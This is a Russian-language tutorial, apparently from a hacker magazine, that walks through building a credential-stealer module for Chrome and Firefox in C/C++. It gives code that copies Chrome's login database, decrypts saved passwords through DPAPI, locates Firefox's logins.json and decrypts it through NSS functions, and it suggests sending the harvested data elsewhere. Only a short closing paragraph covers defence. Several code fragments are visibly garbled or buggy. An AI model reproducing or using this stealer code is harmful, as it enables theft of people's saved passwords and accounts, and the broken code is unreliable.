Итак, браузеры, в основе которых лежит Google Chrome или Mozilla Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам в создании стиллера.Вы наверное знаете о том, что такое стилеры паролей. Их задача — вытащить из операционной системы важные данные, такие как пароли. В сегодняшней статье я расскажу, как хакеры создают стиллер паролей для браузеров Chrome и Firefox.
В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если вам нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом.
Все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль находит и собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в песочнице или виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом. [/box]
Стиллер для Chrome
Начнем с браузера Google Chrome. Для начала давайте получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:
C:\Users\%username%\AppData\Local\Google\Chrome\UserData\Default\Login Data
Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.
Давайте напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).
#define CHROME_DB_PATH "\\Google\\Chrome\\User Data\\Default\\Login Data"
bool get_browser_path(char * db_loc, int browser_family, const char * location) {
memset(db_loc, 0, MAX_PATH);
if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
return 0;
}
}
Вызов функции:
char browser_db[MAX_PATH];
get_browser_path(browser_db, 0, CHROME_DB_PATH);
Давайте вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family, оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).
Если условие browser_family = 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family = 1 — Firefox. Идентификатор CHROME_DB_PATH указывает на базу паролей Chrome. После этого мы получаем путь к базе при помощи функции SHGetFolderPath, передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA, которое означает:
1
#define CSIDL_LOCAL_APPDATA 0x001c // <user name>\Local Settings\Applicaiton Data (non roaming)
Функция SHGetFolderPath уже устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath. Проблема кроется в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:
HRESULT SHGetFolderPath(
HWND hwndOwner,
int nFolder,
HANDLE hToken,
DWORD dwFlags,
LPTSTR pszPath
);
После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH.
База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давайте скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.
int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE);
if (!status) {
// return 0;
}
Теперь подключаемся к базе командой sqlite3_open_v2. Ее прототип:
int sqlite3_open_v2(
const char filename, / Database filename (UTF-8) */
sqlite3 *ppDb, / OUT: SQLite db handle */
int flags, /* Flags */
const char zVfs / Name of VFS module to use */
);
Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK, в противном случае возвращается код ошибки.
sqlite3 *sql_browser_db = NULL;
status = sqlite3_open_v2(TEMP_DB_PATH,
&sql_browser_db,
status = sqlite3_open_v2(TEMP_DB_PATH,
&sql_browser_db,
SQLITE_OPEN_READONLY,
NULL);
if(status != SQLITE_OK) {
sqlite3_close(sql_browser_db);
DeleteFile(TEXT(TEMP_DB_PATH));
}
Обратите внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.
Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec().
status = sqlite3_exec(sql_browser_db,
"SELECT origin_url, username_value, password_value FROM logins",
crack_chrome_db,
sql_browser_db,
&err);
if (status != SQLITE_OK)
return 0;
Эта функция имеет такой прототип:
int sqlite3_exec(
sqlite3, / An open database */
const char sql, / SQL to be evaluated */
int (callback)(void,int,char,char), /* Callback function */
void , / 1st argument to callback */
char *errmsg / Error msg written here */
);
Первый аргумент — наша база паролей, второй — это команда SQL, которая вытаскивает URL файла, логин, пароль и имя пользователя, третий аргумент — это функция обратного вызова, которая и будет расшифровывать пароли, четвертый — передается в нашу функцию обратного вызова, ну а пятый аргумент сообщает об ошибке.
Давайте остановимся подробнее на callback-функции, которая расшифровывает пароли. Она будет использоваться к каждой строке из выборки нашего запроса SELECT. Ее прототип — int (callback)(void,int,char,char), но все аргументы нам не понадобятся, хотя объявлены они должны быть. Саму функцию назовем crack_chrome_db, начинаем писать и объявлять нужные переменные:
int crack_chrome_db(void db_in, int arg, char *arg1, char **arg2) {
DATA_BLOB data_decrypt, data_encrypt;
sqlite3 in_db = (sqlite3)db_in;
BYTE *blob_data = NULL;
sqlite3_blob *sql_blob = NULL;
char *passwds = NULL;
while (sqlite3_blob_open(in_db, "main", "logins", "password_value", count++, 0, &sql_blob) != SQLITE_OK && count <= 20 );
В этом цикле формируем BLOB (то есть большой массив двоичных данных). Далее выделяем память, читаем блоб и инициализируем поля DATA_BLOB:
int sz_blob;
int result;
sz_blob = sqlite3_blob_bytes(sql_blob);
dt_blob = (BYTE *)malloc(sz_blob);
if (!dt_blob) {
sqlite3_blob_close(sql_blob);
sqlite3_close(in_db);
}
data_encrypt.pbData = dt_blob;
data_encrypt.cbData = sz_blob;
А теперь приступим непосредственно к дешифровке паролей. База данных Chrome зашифрована механизмом Data Protection Application Programming Interface (DPAPI). Суть этого механизма заключается в том, что расшифровать данные можно только под той учетной записью, под которой они были зашифрованы. Другими словами, нельзя вытащить базу данных паролей, а потом расшифровать ее уже на своем компьютере. Для расшифровки данных нам потребуется функция CryptUnprotectData.
DPAPI_IMP BOOL CryptUnprotectData(
DATA_BLOB *pDataIn,
LPWSTR *ppszDataDescr,
DATA_BLOB *pOptionalEntropy,
PVOID pvReserved,
CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct,
DWORD dwFlags,
DATA_BLOB *pDataOut
);
if (!CryptUnprotectData(&data_encrypt, NULL, NULL, NULL, NULL, 0, &data_decrypt)) {
free(dt_blob);
sqlite3_blob_close(sql_blob);
sqlite3_close(in_db);
}
После этого выделяем память и заполняем массив passwds расшифрованными данными.
passwds = ( char *)malloc(data_decrypt.cbData + 1);
memset(passwds, 0, data_decrypt.cbData);
int xi = 0;
while (xi < data_decrypt.cbData) {
passwds[xi] = (char)data_decrypt.pbData[xi];
++xi;
}
Собственно, на этом все! После этого passwds будет содержать учетные записи пользователей и URL. Можно эту информацию вывести на экран или сохранить в файл и отправить куда-нибудь.
Стиллер для Firefox
Переходим к Firefox. Это будет немного посложнее. Для начала давайте получим путь до базы данных паролей Firefox. Помните, в нашей универсальной функции get_browser_path мы передавали параметр browser_family? В случае Chrome он был равен нулю, а для Firefox установим 1.
bool get_browser_path(char * db_loc, int browser_family, const char * location) {
...
if (browser_family = 1) {
memset(db_loc, 0, MAX_PATH);
if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
// return 0;
}
В случае с Firefox мы не сможем, как в Chrome, сразу указать путь до каталога пользователя. Дело в том, что имя каталога пользовательского профиля генерируется случайным образом. Но это не помеха, ведь известно начало пути (\\Mozilla\\Firefox\\Profiles\\). Достаточно поискать в нем объект «папка» и проверить наличие в ней файла \\logins.json«. Именно в этом файле хранятся данные логинов и паролей. Разумеется, в зашифрованном виде. Реализуем все это в коде.
lstrcat(db_loc, TEXT(location));
// Объявляем переменные
const char * profileName = "";
WIN32_FIND_DATA w_find_data;
const char * db_path = db_loc;
// Создаем маску для поиска функцией FindFirstFile
lstrcat((LPSTR)db_path, TEXT("*"));
// Просматриваем, нас интересует объект с атрибутом FILE_ATTRIBUTE_DIRECTORY
HANDLE gotcha = FindFirstFile(db_path, &w_find_data);
while (FindNextFile(gotcha, &w_find_data) != 0){
if (w_find_data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if (strlen(w_find_data.cFileName) > 2) {
profileName = w_find_data.cFileName;
}
}
}
// Убираем звездочку :)
db_loc[strlen(db_loc) - 1] = '\0';
lstrcat(db_loc, profileName);
// Наконец, получаем нужный нам путь
lstrcat(db_loc, "\\logins.json");
return 1;
В самом конце переменная db_loc, которую мы передавали в качестве аргумента в нашу функцию, содержит полный путь до файла logins.json, а функция возвращает 1, сигнализируя о том, что она отработала корректно.
Теперь получим хендл файла паролей и выделим память под данные. Для получения хендла используем функцию CreateFile, как советует MSDN.
DWORD read_bytes = 8192;
DWORD lp_read_bytes;
char *buffer = (char *)malloc(read_bytes);
HANDLE db_file_login = CreateFileA(original_db_location,
GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,
NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
ReadFile(db_file_login, buffer, read_bytes, &lp_read_bytes, NULL);
Все готово, но в случае с Firefox все не будет так просто, как с Chrome, — мы не сможем просто получить нужные данные обычным запросом SELECT, да и шифрование не ограничивается одной-единственной функцией WinAPI.
Network Security Services (NSS)
Браузер Firefox активно использует функции Network Security Services для реализации шифрования своей базы паролей. Эти функции находятся в динамической библиотеке, которая лежит по адресу:
C:\Program Files\Mozilla Firefox\nss3.dll
Все интересующие функции придется получать из этой DLL. Сделать это можно стандартным образом, при помощи LoadLibrary\GetProcAdress. Код однообразный и большой, поэтому я просто приведу список функций, которые нам понадобятся:
- NSS_Init;
- PL_Base64Decode;
- PK11SDR_Decrypt;
- PK11_Authenticate;
- PK11_GetInternalKeySlot;
- PK11_FreeSlot.
char * data_uncrypt(std::string pass_str) {
// Объявляем переменные
SECItem crypt;
SECItem decrypt;
PK11SlotInfo *slot_info;
// Выделяем память для наших данных
char *char_dest = (char *)malloc(8192);
memset(char_dest, NULL, 8192);
crypt.data = (unsigned char *)malloc(8192);
crypt.len = 8192;
memset(crypt.data, NULL, 8192);
// Непосредственно расшифровка функциями NSS
PL_Base64Decode(pass_str.c_str(), pass_str.size(), char_dest);
memcpy(crypt.data, char_dest, 8192);
slot_info = PK11_GetInternalKeySlot();
PK11_Authenticate(slot_info, TRUE, NULL);
PK11SDR_Decrypt(&crypt, &decrypt, NULL);
PK11_FreeSlot(slot_info);
// Выделяем память для расшифрованных данных
char *value = (char *)malloc(decrypt.len);
value[decrypt.len] = 0;
memcpy(value, decrypt.data, decrypt.len);
return value;
}
Теперь осталось парсить файл logins.json и применять нашу функцию расшифровки. Для краткости кода я буду использовать регулярные выражения и их возможности в C++ 11.
string decode_data = buffer;
// Определяем регулярную последовательность для сайтов, логинов и паролей
regex user("\"encryptedUsername\":\"([^\"]+)\"");
regex passw("\"encryptedPassword\":\"([^\"]+)\"");
regex host("\"hostname\":\"([^\"]+)\"");
// Объявим переменную и итератор
smatch smch;
string::const_iterator pars(decode_data.cbegin());
// Парсинг при помощи regex_search, расшифровка данных нашей функцией data_uncrypt
// и вывод на экран расшифрованных данных
do {
printf("Site\t: %s", smch.str(1).c_str());
regex_search(pars, decode_data.cend(), smch, user);
printf("Login: %s", data_uncrypt(smch.str(1)));
regex_search(pars, decode_data.cend(), smch, passw);
printf("Pass: %s",data_uncrypt( smch.str(1)));
pars += smch.position() + smch.length();
} while (regex_search(pars, decode_data.cend(), smch, host));
Защита от стиллера паролей
Мы разобрались, как хранятся пароли в разных браузерах, и узнали, что нужно делать, чтобы их извлечь. Можно ли защититься от подобных методов восстановления сохраненных паролей? Да, конечно. Если установить в браузере мастер-пароль, то он выступит в качестве криптографической соли для расшифровки базы данных паролей. Без ее знания восстановить данные будет невозможно.